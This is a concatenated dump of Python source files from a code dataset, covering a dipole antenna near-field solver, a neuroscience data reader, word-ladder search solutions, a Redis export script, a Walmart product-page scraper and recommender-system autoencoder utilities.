ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd + 0.0005*wavelength\r\n ryy[mp1+2] = ydd\r\n rzz[mp1+2] = zdd\r\n \r\n elif (iy == 1):\r\n \r\n rxx[mp1] = xdd \r\n ryy[mp1] = ydd - 0.0005*wavelength\r\n rzz[mp1] = zdd\r\n \r\n rxx[mp1+1] = xdd \r\n ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd \r\n ryy[mp1+2] = ydd + 0.0005*wavelength\r\n rzz[mp1+2] = zdd\r\n \r\n else:\r\n \r\n rxx[mp1] = xdd \r\n ryy[mp1] = ydd \r\n rzz[mp1] = zdd - 0.0005*wavelength\r\n \r\n rxx[mp1+1] = xdd \r\n ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd \r\n ryy[mp1+2] = ydd \r\n rzz[mp1+2] = zdd + 0.0005*wavelength\r\n \r\n \r\n (rx1, ry1, rz1) = rmhvector(rxx,ryy,rzz,mp1+1)\r\n (rx2, ry2, rz2) = rmhvector(rxx,ryy,rzz,mp1)\r\n \r\n diffx = rx1 - rx2\r\n diffy = ry1 - ry2\r\n diffz = rz1 - rz2\r\n \r\n esum = 0.0\r\n \r\n for n in range(0,nunkns):\r\n np1 = n + 1\r\n \r\n psi1 = vecpot(rxx, ryy, rzz, wk, rad, mp1+1, np1, 0.5)\r\n psi2 = vecpot(rxx, ryy, rzz, wk, rad, mp1+1, np1, -0.5)\r\n \r\n psi3 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, +0.5, np1, np1+1)\r\n psi4 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, +0.5, np1-1, np1)\r\n psi5 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, -0.5, np1, np1+1)\r\n psi6 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, -0.5, np1-1, np1)\r\n \r\n \r\n # s unit vectors\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, np1)\r\n (sx2, sy2, sz2, rmag) = sunit(rx, ry, rz, n)\r\n \r\n #dotties \r\n dot1 = psi1*(diffx*sx1+diffy*sy1+diffz*sz1)\r\n dot2 = psi2*(diffx*sx2+diffy*sy2+diffz*sz2)\r\n dotprod = (wk**2)*(dot1 + dot2)\r\n \r\n matrix = factor*(dotprod - psi3/delta + psi4/delta + psi5/delta - psi6/delta)\r\n esum = esum + matrix*solvector[n] #change vector operation\r\n \r\n return( -esum/0.001/np.sqrt(2)) #x components of electric field\r\n \r\n\r\n\r\n\r\n\r\n# z-comp of Electric Field (Near Field Calculation for a Wire\r\n#Antenna) for near field calculation August, 2007\r\n\r\n#******************** INPUT ******************************* % Variables with asterik (*) on the comment on the right side are INPUT\r\nnunkns = gnunkns \r\nfeedVoltage = FV # ******** Number of Unknowns (for current) on the Antenna\r\nnunkns2 = nunkns + 2\r\nfreq = Freq # ******************* Frequency (Hz)\r\nvel = 3 * 10 ** 8 # velocity of light in free space\r\nomega = 2 * np.pi * freq # angular frequency (rad/sec)\r\nwk = omega / vel # propagation constant (2*pi/lambda)\r\nwavelength = vel / freq # wavelength (m)\r\nlength = Len * wavelength # ****************** Half dipole length (in lambda)\r\ndlength = 2 * length\r\nrad = Rad * wavelength # ******************** Radius of Dipole (in lambda)\r\nwaveimp = WI # ********** Wave Impedance in free space(ohms)\r\neps = 1 / (36 * np.pi * 10 ** 9 ) # ********** Free space permittivity (F/m)\r\nzg = ZG # ********* Feed point of the antenna (zg=0 for Center-fed)\r\ndelta = 2 * length / (nunkns + 1 ) # Antenna segment length (2*L/(N+1))\r\n\r\n\r\n# Grid points (x,y,z) where near field needs to be computed\r\ndx = 0\r\ndy = 0\r\ndz = 0.001\r\nndx = 1\r\nndy = 1\r\nndz = 300\r\nxstart = 0.0 * wavelength\r\n\r\nystart_array = np.array([0.01, 0.03, 0.05])\r\nzstart = 0.001 * wavelength\r\n\r\n\r\n# ****** For Antenna case, the Dipole is Center-fed with 1 Volt ******\r\n# Forcing Function \"vmvector\" is Unity at feedpoint\r\nvmvector= np.arange(nunkns,dtype=np.float).reshape(nunkns,1)\r\n\r\nfor i in range(1,nunkns):\r\n matchpnt = ((nunkns - 1) / 2) + 0\r\n \r\n if (i == matchpnt):\r\n \r\n vmvector[i] = feedVoltage # ******* Antenna feed voltage(change the value inside the brackets)\r\n else:\r\n vmvector[i] = 0\r\n \r\n\r\n\r\n# ************************** End of Input Data********************\r\n# The array rx,ry,rz gives the x,y,z components of wire segment end points\r\n \r\nrx = np.arange(nunkns2,dtype=np.float)\r\nry = np.arange(nunkns2,dtype=np.float)\r\nrz = np.arange(nunkns2,dtype=np.float)\r\n\r\nfor n in range(0, nunkns2):\r\n rx[n] = 0.0\r\n ry[n] = 0.0\r\n rz[n] = -(length) + delta*(n-0)\r\n \r\n \r\n \r\n# Calculation of the Impedance Matrix \"zmatrix\"\r\n#factor = np.dtype(np.complex128)\r\n \r\nfactor = -1 / (1j * 4 * np.pi * omega * eps)\r\nzmatrix = np.zeros(shape=(nunkns,nunkns),dtype=np.complex)\r\nfor m in range(0,nunkns):\r\n mp1 = m + 1\r\n (rx1,ry1,rz1) = rmhvector(rx,ry,rz,mp1)\r\n (rx2,ry2,rz2) = rmhvector(rx,ry,rz,m)\r\n \r\n diffx = rx1 - rx2\r\n diffy = ry1 - ry2\r\n diffz = rz1 - rz2\r\n \r\n for l in range(0,nunkns):\r\n np1 = l + 1\r\n \r\n\r\n # Contribution due to vector potential\r\n#\r\n\r\n psi1 = vecpot(rx, ry, rz, wk, rad, mp1, np1, 0.5)\r\n psi2 = vecpot(rx, ry, rz, wk, rad, mp1, np1, -0.5)\r\n\r\n #Contribution due to scalar potential\r\n\r\n psi3 = scalarpot(rx, ry, rz, wk, rad, mp1, 0.5, np1, np1 + 1)\r\n psi4 = scalarpot(rx, ry, rz, wk, rad, mp1, 0.5, np1 - 1, np1)\r\n psi5 = scalarpot(rx, ry, rz, wk, rad, mp1, -0.5, np1, np1 + 1)\r\n psi6 = scalarpot(rx, ry, rz, wk, rad, mp1, -0.5, np1 - 1, np1)\r\n\r\n # S unit vectors\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, np1)\r\n (sx2, sy2, sz2, rmag) = sunit(rx, ry, rz, l)\r\n\r\n# # Dot products\r\n dot1 = psi1 * (diffx * sx1 + diffy * sy1 + diffz * sz1)\r\n dot2 = psi2 * (diffx * sx2 + diffy * sy2 + diffz * sz2)\r\n dotprod = wk ** 2 * (dot1 + dot2)\r\n#\r\n ytt=factor * (dotprod - psi3 / delta + psi4 / delta + psi5 / delta - psi6 / delta)\r\n zmatrix[m][l] = factor * (dotprod - psi3 / delta + psi4 / delta + psi5 / delta - psi6 / delta)\r\n#\r\n# \r\n\r\n#\r\n## SOLUTION BY MATRIX INVERSION\r\n#\r\nsolstep = inv(zmatrix) * vmvector # solvector is the solution vector\r\nsolvector=solstep[15]\r\n##with current on the antenna\r\n## Plot the Current Distribution on the Wire Antenna\r\n#\r\nrsolvec = np.real(solvector)\r\nisolvec = np.imag(solvector)\r\nrrealpart = np.arange(nunkns,dtype=np.float)\r\nrealpart = np.arange(nunkns2,dtype=np.float)\r\nimagpart = np.arange(nunkns2,dtype=np.float)\r\niimagpart = np.arange(nunkns,dtype=np.float)\r\nzpart = np.arange(nunkns,dtype=np.float)\r\nfor ip in range (0,nunkns):\r\n rrealpart[ip] = rsolvec[ip]\r\n iimagpart[ip] = isolvec[ip]\r\n zpart[ip] = rz[ip]\r\n#end\r\n#\r\nfor ipp in range(0,nunkns2-1):\r\n if ipp == 0:\r\n realpart[ipp] = 0\r\n imagpart[ipp] = 0\r\n elif ipp == nunkns2:\r\n realpart[ipp] = 0\r\n imagpart[ipp] = 0\r\n else:\r\n realpart[ipp] = rrealpart[ipp - 1]\r\n imagpart[ipp] = iimagpart[ipp - 1]\r\nrealpart[nunkns2-1] = 0\r\nimagpart[nunkns2-1] = 0 \r\n\r\n#\r\n#\r\n## Near Field Computations\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmp1 = nunkns2 + 1\r\nnearfield = np.zeros(shape=(3,ndz),dtype=np.float)\r\nxd = np.arange(ndx,dtype=np.float)\r\nyd = np.arange(ndy,dtype=np.float)\r\nzd = np.arange(ndz,dtype=np.float)\r\nfor kk in range(0,3):\r\n nfield_points = 0\r\n ystart = ystart_array[kk]\r\n for i in range(0,ndx):\r\n xd[i] = xstart + (i - 1) * dx\r\n xdi = xd[i]\r\n for j in range(0,ndy):\r\n yd[j]= ystart + (j - 1) * dy\r\n ydj = yd[j]\r\n for k in range(0,ndz):\r\n nfield_points = nfield_points + 1\r\n zd[k] = zstart + (k - 0) * dz\r\n zdk = zd[k]\r\n # efieldx,efieldy and efieldz are the x,y,z components of the\r\n #Electric Field\r\n\r\n # **** NOTE ***** In this example only the z-comp of E-field is\r\n #being \r\n # therefore, efieldx and efieldy are commented out\r\n\r\n #efieldx=efieldnear(rx,ry,rz,xdi,ydj,zdk,solvector,wk,rad,factor,delta,\r\n #wavelength,1,0,0,nunkns);\r\n\r\n #efieldy=efieldnear(rx,ry,rz,xdi,ydj,zdk,solvector,wk,rad,factor,delta,\r\n #wavelength,0,1,0,nunkns);\r\n\r\n efieldz = efieldnear(rx, ry, rz, xdi, ydj, zdk, solvector, wk, rad, factor, delta, wavelength, 0, 0, 1, nunkns)\r\n\r\n # nearfield(kk,nfield_points)=abs(efieldx); % if x-comp of near\r\n #field is needed\r\n # nearfield(kk,nfield_points)=abs(efieldy); % if y-comp of near\r\n #field is needed\r\n nearfield[kk][nfield_points-1] = abs(efieldz) # if z-comp of near\r\n newnearfield=nearfield.astype(str)\r\n \r\n #field is needed\r\n#-0.145305793270531 - 0.069104594965050i\r\n# end # loop over k (z values)\r\n# end # loop for j (y values)\r\n# end# loop over i (x values)\r\n#end# loop over kk\r\n#\r\n#\r\n#\r\n#If following three lines are commented out The Antenna Current is\r\n#not plotted\r\nplt.plot(rz,realpart,'k-',rz,imagpart,'o')\r\nplt.grid()\r\nplt.title('Current Distribution over a lamda/2 dipole @ %f GHz' %(Freq1))\r\nplt.xlabel('Length (m)')\r\nplt.ylabel('Current Distribution (A)')\r\n\r\n#\r\n#\r\n## Plot of Electric Field vs z/lambda for three values of rho/lambda\r\n## % % \r\nzd_to_meter=zd/wavelength\r\n\r\nplt.figure(0)\r\nplt.grid()\r\nplt.plot(zd_to_meter, nearfield[0],'k-')\r\nplt.plot(zd_to_meter, nearfield[1],'b-')\r\nplt.plot(zd_to_meter, nearfield[2],'r-')\r\nplt.title('Z-component of Electric Field for lamda/2 dipole at: %f GHz' %(Freq1))\r\nplt.xlabel('Z (m)')\r\nplt.ylabel('Electric Field in (V/m)')\r\n\r\nprint(zd)\r\nprint(\"hmmmmmmmmmmmmmmm\")\r\nprint(newnearfield)\r\n#plt.plot(zd(mslice[:]), nearfield(2, mslice[:]), mstring('b-'))\r\n#hold(mstring('on'))\r\n#grid(mstring('on'))\r\n\r\n#\r\n#plot(zd(mslice[:]), nearfield(3, mslice[:]), mstring('r-'))\r\n\r\n#xlabel(mstring('Z/lambda'))\r\n#ylabel(mstring('Electric Field in (V/m)'))\r\n#gtext(mstring('y (lambda) =0.01'))\r\n#gtext(mstring('0.03'))\r\n#gtext(mstring('0.05'))\r\n#hold(mstring('off'))\r\n","sub_path":"NearFieldCo/NearFieldCodeV3.2.py","file_name":"NearFieldCodeV3.2.py","file_ext":"py","file_size_in_byte":23666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295461861","text":"# -*- coding: utf-8 -*-\n\nfrom neo.io.basefromrawio import BaseFromRaw\nfrom neo.rawio.blackrockrawio import BlackrockRawIO\n\n\ndef _move_channel_indexes_and_analogsignals(from_block, to_block):\n if len(from_block.segments) != len(to_block.segments):\n raise ValueError('Can not assign segments between block 1 and 2. Different number of '\n 'segments present.')\n\n for seg_id in range(len(from_block.segments)):\n for ana in from_block.segments[seg_id].analogsignals:\n # redirect links from data object to container objects\n ana.segment = to_block.segments[seg_id]\n ana.channel_index.block = to_block\n\n # add links from container objects to analogsignal\n ana.segment.analogsignals.append(ana)\n # channel index was already relinked for another segment\n if ana.channel_index not in to_block.channel_indexes:\n to_block.channel_indexes.append(ana.channel_index)\n\n # remove (now) duplicated units from channel_index, remove irregular signals\n ana.channel_index.units = []\n ana.channel_index.irregularlysampledsignals = []\n\n\nclass BlackrockIO_single_nsx(BlackrockRawIO, BaseFromRaw):\n \"\"\"\n Supplementary class for reading BlackRock data using only a single nsx file.\n \"\"\"\n name = 'Blackrock IO for single nsx'\n description = \"This IO reads a pair of corresponding nev and nsX files of the Blackrock \" \\\n \"\" + \"(Cerebus) recording system.\"\n\n _prefered_signal_group_mode = 'split-all'\n\n def __init__(self, filename, nsx_to_load=None, **kargs):\n BlackrockRawIO.__init__(self, filename=filename, nsx_to_load=nsx_to_load, **kargs)\n BaseFromRaw.__init__(self, filename)\n\n\nclass BlackrockIO(BlackrockIO_single_nsx):\n name = 'Blackrock IO'\n description = \"This IO reads .nev/.nsX files of the Blackrock (Cerebus) recording system.\"\n\n def __init__(self, filename, nsx_to_load='all', **kargs):\n BlackrockIO_single_nsx.__init__(self, filename)\n if nsx_to_load == 'all':\n self._selected_nsx = self._avail_nsx\n else:\n self._selected_nsx = [nsx_to_load]\n self._nsx_ios = []\n for nsx in self._selected_nsx:\n self._nsx_ios.append(BlackrockIO_single_nsx(filename, nsx_to_load=nsx, **kargs))\n\n def read_block(self, **kargs):\n bl = self._nsx_ios[0].read_block(**kargs)\n for nsx_ios in self._nsx_ios[1:]:\n nsx_block = nsx_ios.read_block(**kargs)\n _move_channel_indexes_and_analogsignals(nsx_block, bl)\n del nsx_block\n return bl\n\n def read_segment(self, **kargs):\n seg = self._nsx_ios[0].read_segment(**kargs)\n for nsx_ios in self._nsx_ios[1:]:\n nsx_seg = nsx_ios.read_segment(**kargs)\n seg.analogsignals.extend(nsx_seg.analogsignals)\n for ana in nsx_seg.analogsignals:\n ana.segment = seg\n ana.channel_index = None\n del nsx_seg\n return seg\n","sub_path":"neo/io/blackrockio.py","file_name":"blackrockio.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"269043056","text":"#http://www.cnblogs.com/yrbbest/p/4438488.html\n#bi-bfs\n\n\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time\nEach intermediate word must exist in the word list\nFor example,\n\nGiven:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\nAs one shortest transformation is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\",\nreturn its length 5.\n\nNote:\nReturn 0 if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\n\"\"\"\n\nclass Solution(object):\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: Set[str]\n :rtype: int\n \"\"\"\n #return self.bfs(beginWord, endWord, wordList)\n return self.bi_bfs(beginWord, endWord, wordList)\n \n def bfs(self, beginWord, endWord, wordList):\n q=[]\n #isIn={}\n #isIn[beginWord]=True\n q.append( (beginWord, 1) )\n while q:\n (word, level) = q.pop(0)\n for i in range(len(word)):\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if word[i]!=c:\n new_word = word[:i] + c + word[i+1:]\n #if new_word not in isIn and new_word in wordList:\n if new_word in wordList:\n if new_word == endWord:\n return level+1\n q.append( (new_word, level+1) )\n #isIn[new_word]=True\n wordList.remove(new_word)\n \n return 0\n \n def bi_bfs(self, beginWord, endWord, wordList):\n begin_set =set()\n end_set = set()\n wordset = set(wordList)\n \n begin_set.add( (beginWord) )\n end_set.add( (endWord) )\n step = 2\n while len(begin_set)>0 and len(end_set)>0:\n if len(begin_set) > len(end_set):\n tmp = end_set\n end_set = begin_set\n begin_set = tmp\n tmp = set()\n for word in begin_set:\n for i in range(len(word)):\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if word[i]!=c:\n new_word = word[:i] + c + word[i+1:]\n if new_word in end_set:\n return step\n if new_word in wordset:\n tmp.add(new_word)\n wordset.remove(new_word)\n begin_set = tmp \n step +=1 \n \n return 0\n","sub_path":"127_Word_Ladder.py","file_name":"127_Word_Ladder.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81471325","text":"import redis,json\n\ndef connect_redis():\n\tpool = redis.ConnectionPool(host='127.0.0.1', port=6379, db=0, password=None,\n\t\t\t\t\t\t\t\tencoding='utf-8', decode_responses=True)\n\tredisdb = redis.Redis(connection_pool=pool)\n\tprint('链接Redis:{0} 成功'.format(redisdb))\n\treturn redisdb\n\ndef read_info():\n\tfor i in redisdb.sscan_iter(articlesIDKey):\n\t\ti = json.loads(i)\n\t\tarID = i['ID']\n\t\tprint(arID)\n\ndef save_info(redisdb,filen):\n\twith open(filen,'w') as f:\n\t\tfor i in redisdb.sscan_iter(articlesIDKey):\n\t\t\tline = '{0}\\n'.format(json.dumps(json.loads(i),ensure_ascii=False))\n\t\t\tf.write(line)\n\t\t\n\t\tprint('保存完成')\n\nif __name__ == '__main__':\n\tfilen = r'/media/gumoha/资料/Scrapy/QDaily/ArticlesData/-ArticlesSketch-.json'\n\tarticlesIDKey = 'Qdaily_articlesID'\n\tredisdb = connect_redis()\n\t\n\tsave_info(redisdb,filen)\n\t\n\t\t\n\t\n\t\n","sub_path":"Redis_ReadArticlesIDInfo.py","file_name":"Redis_ReadArticlesIDInfo.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446606405","text":"# BSD 3-Clause License; see https://github.com/jpivarski/awkward-1.0/blob/master/LICENSE\n\nimport sys\nimport os\nimport json\n\nimport pytest\nimport numpy\n\nimport awkward1\n\nnumba = pytest.importorskip(\"numba\")\n\ndef test_boxing():\n @numba.njit\n def f1(q):\n z = q\n return 3.14\n\n a = awkward1.layout.FillableArray()\n assert sys.getrefcount(a) == 2\n f1(a)\n assert sys.getrefcount(a) == 2\n\n @numba.njit\n def f2(q):\n z = q\n return q\n\n a = awkward1.layout.FillableArray()\n assert sys.getrefcount(a) == 2\n f2(a)\n assert sys.getrefcount(a) == 2\n b = f2(a)\n assert sys.getrefcount(a) == 3\n\n assert str(b.snapshot()) == \"\"\"\"\"\"\n\ndef test_simple():\n @numba.njit\n def f1(q):\n q.clear()\n return 3.14\n\n a = awkward1.layout.FillableArray()\n f1(a)\n\ndef test_boolean():\n @numba.njit\n def f1(q):\n q.boolean(True)\n q.boolean(False)\n q.boolean(False)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert awkward1.tolist(a.snapshot()) == [True, False, False]\n assert awkward1.tolist(b.snapshot()) == [True, False, False]\n\ndef test_integer():\n @numba.njit\n def f1(q):\n q.integer(1)\n q.integer(2)\n q.integer(3)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert awkward1.tolist(a.snapshot()) == [1, 2, 3]\n assert awkward1.tolist(b.snapshot()) == [1, 2, 3]\n\ndef test_real():\n @numba.njit\n def f1(q, z):\n q.real(1)\n q.real(2.2)\n q.real(z)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a, numpy.array([3.5], dtype=numpy.float32)[0])\n assert awkward1.tolist(a.snapshot()) == [1, 2.2, 3.5]\n assert awkward1.tolist(b.snapshot()) == [1, 2.2, 3.5]\n\ndef test_list():\n @numba.njit\n def f1(q):\n q.beginlist()\n q.real(1.1)\n q.real(2.2)\n q.real(3.3)\n q.endlist()\n q.beginlist()\n q.endlist()\n q.beginlist()\n q.real(4.4)\n q.real(5.5)\n q.endlist()\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert awkward1.tolist(a.snapshot()) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert awkward1.tolist(b.snapshot()) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n\n @numba.njit\n def f2(q):\n return len(q)\n\n assert f2(a) == 3\n assert f2(b) == 3\n\n @numba.njit\n def f3(q):\n q.clear()\n return q\n\n c = f3(b)\n assert awkward1.tolist(a.snapshot()) == []\n assert awkward1.tolist(b.snapshot()) == []\n assert awkward1.tolist(c.snapshot()) == []\n","sub_path":"tests/test_PR022_fillablearray_in_numba.py","file_name":"test_PR022_fillablearray_in_numba.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600436101","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom numpy import genfromtxt, savetxt\n\nimport os\nimport numpy as np\nimport gzip, pickle\n\nimport theano\nimport theano.tensor as T\n\n# Cost Functions\ndef meanSquaredError(x_predicted, x):\n return T.sum((x_predicted - x) ** 2, axis=1)\n \ndef crossEntropyCost(x_predicted, x):\n return -T.sum(x * T.log(x_predicted) + (1 - x) * T.log(1 - x_predicted), axis=1)\n\n# Activation Functions\ndef impTanh(x):\n beta = 2.0/3.0\n alfa = 2.5\n return alfa * T.tanh(beta * x)\n\n# Format path for results\ndef makePath(type_experiment, lvet, sl_technique, user_hlayers_sizes, item_hlayers_sizes, training_epochs, corruption_levels, n_factors,\n normalization_method, matrix_normalization, preprocess_svd, sparsity_weight, learning_rate, activation, dropout, early_stopping):\n \n dpout = 'NoDropout'\n sparse = 'NoSparse'\n earlystop = 'NoEarlyStop'\n if sparsity_weight > 0:\n sparse = 'Sparse'\n if dropout == True:\n dpout = 'Dropout'\n if early_stopping == True:\n earlystop = 'EarlyStop'\n \n if lvet == 'autoencoder' and preprocess_svd:\n return '%s%f-%s-SVD-%d-%s/%s-%s-%s-u%s-i%s-%s-%diterations-%s-%s-lr%f' % (sparse, sparsity_weight, dpout, activation, n_factors, type_experiment, lvet, sl_technique, '-'.join(str(n) for n in user_hlayers_sizes), '-'.join(str(n) for n in item_hlayers_sizes), '-'.join(str(n) for n in corruption_levels), training_epochs, normalization_method, matrix_normalization, learning_rate)\n \n elif lvet == 'autoencoder' and not preprocess_svd:\n return '%s%f-%s-NoSVD-%s/%s-%s-%s-u%s-i%s-%s-%diterations-%s-%s-lr%f' % (sparse, sparsity_weight, dpout, activation, type_experiment, lvet, sl_technique, '-'.join(str(n) for n in user_hlayers_sizes), '-'.join(str(n) for n in item_hlayers_sizes), '-'.join(str(n) for n in corruption_levels), training_epochs, normalization_method, matrix_normalization, learning_rate)\n \n elif lvet == 'randomized_svd':\n return '%s-%s-%s-%d-%s-%s' % (type_experiment, lvet, sl_technique, n_factors, normalization_method, matrix_normalization)\n else:\n print('Invalid latent variable extraction technique.')\n sys.exit(-1)\n\n# Read and prepare data\ndef readDataset(dataset_path, delimiter):\n dataset = genfromtxt(dataset_path, delimiter=delimiter, dtype='f8')\n return dataset\n\ndef saveDataset(filename, ratings_matrix, delimiter):\n parent = os.path.abspath(os.path.join(filename, os.pardir))\n if not os.path.isdir(parent):\n os.makedirs(parent)\n np.savetxt(filename, ratings_matrix, delimiter=delimiter)\n\ndef gzipDataset(input_filename, output_filename, delimiter):\n\n data = genfromtxt(input_filename, delimiter=delimiter)\n\n train_set_x = data\n train_set_y = data\n\n val_set_x = data\n val_set_y = data\n\n test_set_x = data\n test_set_y = data\n\n train_set = train_set_x, train_set_y\n val_set = val_set_x, val_set_y\n test_set = test_set_x, val_set_y\n\n dataset = [train_set, val_set, test_set]\n\n f = gzip.open(output_filename,'wb')\n pickle.dump(dataset, f, protocol=2)\n f.close()\n \ndef loadDataset(dataset):\n\n print('... loading data')\n\n f = gzip.open(dataset, 'rb')\n train_set, valid_set, test_set = pickle.load(f)\n f.close()\n\n test_set_x, test_set_y = sharedDataset(test_set)\n valid_set_x, valid_set_y = sharedDataset(valid_set)\n train_set_x, train_set_y = sharedDataset(train_set)\n\n rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\n (test_set_x, test_set_y)]\n return rval\n\ndef sharedDataset(data_xy, borrow=True):\n data_x, data_y = data_xy\n shared_x = theano.shared(np.asarray(data_x,\n dtype=theano.config.floatX),\n borrow=borrow)\n shared_y = theano.shared(np.asarray(data_y,\n dtype=theano.config.floatX),\n borrow=borrow)\n return shared_x, T.cast(shared_y, 'int32')\n","sub_path":"ae/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"427049762","text":"pamt = int(input(\"Enter the Purchase amount : \"))\nif(pamt>=0):\n if pamt <= 100000:\n discount = pamt*0.2\n elif pamt <= 50000:\n discount = pamt*0.15\n elif pamt <= 30000:\n discount = pamt*0.1\n elif pamt <= 10000:\n disc = pamt*0.05\n print(\"Discount amount :\", discount)\n print(\"Amount To be Paid by Customer : \", pamt-discount)\nelse:\n print(\"The Amount Entry is Invalid\")\n","sub_path":"Week04AssignmentsFolder/w4_a3.py","file_name":"w4_a3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422307277","text":"user_input = input(\"Enter a string: \")\ndigit_count = 0\nletter_count = 0\nfor ch in user_input:\n if ch.isnumeric():\n digit_count += 1\n elif ch.isaplha():\n letter_count += 1\nprint(\"\"\"\nLetters: %d\nDigits: %d\n\"\"\" % (digit_count, letter_count))","sub_path":"Task2.8.py","file_name":"Task2.8.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"26713224","text":"import json\nimport traceback\nfrom io import StringIO\nimport lxml.html as lh\nimport requests\n# from jsonpath_ng import\nfrom jsonpath_ng.ext import parse\nimport string\nimport re\n__all__ = [\"do_the_job\"]\n\ndef get_content(URL):\n # proxy = {\"http\": \"http://10099:M9GUfa@hn4.nohodo.com:10099/\",\n # \"https\": \"http://10099:M9GUfa@hn4.nohodo.com:10099/\"}\n headers = {'Connection': 'keep-alive',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n\n r = requests.get(URL, headers=headers, timeout=10)\n ready_str = r.text\n with open('walmartcheck.html','w') as f:\n f.write((ready_str))\n elem_tree = lh.parse(StringIO(ready_str))\n xpath = '''//*[@id = 'atf-content']'''\n elemlst = elem_tree.xpath(xpath)\n if len(elemlst) == 0:\n elemlst = re.findall('window.__WML_REDUX_INITIAL_STATE__ *= *({.*});',ready_str,re.MULTILINE|re.DOTALL)\n if len(elemlst) == 0:\n raise RuntimeError('Cannot find xpath:{} or __WML_REDUX_INITIAL_STATE__'.format(xpath))\n else:\n printable = set(string.printable)\n clean_str = ''.join(filter(lambda x: x in printable, elemlst[0]))\n else:\n printable = set(string.printable)\n clean_str=''.join(filter(lambda x: x in printable,elemlst[0].text))\n elemdict = json.loads(clean_str)\n return elemdict\n\n\ndef do_the_job(jobdict, driver=None):\n def getoffer(offerid, elemdict):\n return parse('$..product.offers.\"{}\"'.format(offerid)).find(elemdict)[0].value\n\n #jobdict = json.loads(payload_json)\n PID = jobdict['PID']\n URL = jobdict['URL']\n SKU = None\n if URL is None:\n URL = 'https://www.walmart.com/ip/{}'.format(PID)\n try:\n elemdict = get_content(URL)\n reportback = \\\n list(filter(lambda x: x.value['usItemId'] == '{}'.format(PID), parse('$..product.products.*').find(elemdict)))[\n 0].value\n if 'offers' in reportback:\n reportback['offers_feched'] = [getoffer(x, elemdict) for x in reportback['offers']]\n else:\n reportback['offers_feched'] = None\n\n retwrapper = {\n 'STATUS':'SUCCESS',\n 'PAYLOAD': json.dumps(reportback),\n }\n except:\n retwrapper = {\n 'STATUS': 'FAIL',\n 'PAYLOAD': json.dumps({'Reason':traceback.format_exc()}),\n }\n return retwrapper\n\n\nif __name__ == '__main__':\n testdict = {\"WEBSITE\":\"Walmart\",\n \"PID\": \"124269570\",\n \"SKU\": \"124269570\",\n \"URL\": \"https://www.walmart.com/ip/Round-Center-Cubic-Zirconia-Ring-Sterling-Silver-925/124269570\"}\n print(do_the_job(testdict))","sub_path":"job_by_websites/Walmart.py","file_name":"Walmart.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"598821021","text":"import os\nimport glob\nimport yaml\n\n\nclass GlobalVariables(object):\n \"\"\"\n This class will hold all the variables that are not specific to a single assembly.\n \"\"\"\n def __init__(self):\n self.assembly_file_name = ''\n self.xc_library = ''\n self.xc_set = ''\n self.universe = 100\n self.cellNumber = 100\n self.surfaceNumber = 100\n self.materialNumber = 100\n self.temperature = 0\n self.temp_adjusted_density = False\n self.temp_adjusted_volume = False\n self.clad_smear = False\n self.bond_smear = False\n self.void_per = 0\n self.file_name = ''\n self.number_generations = 0\n self.number_skipped_generations 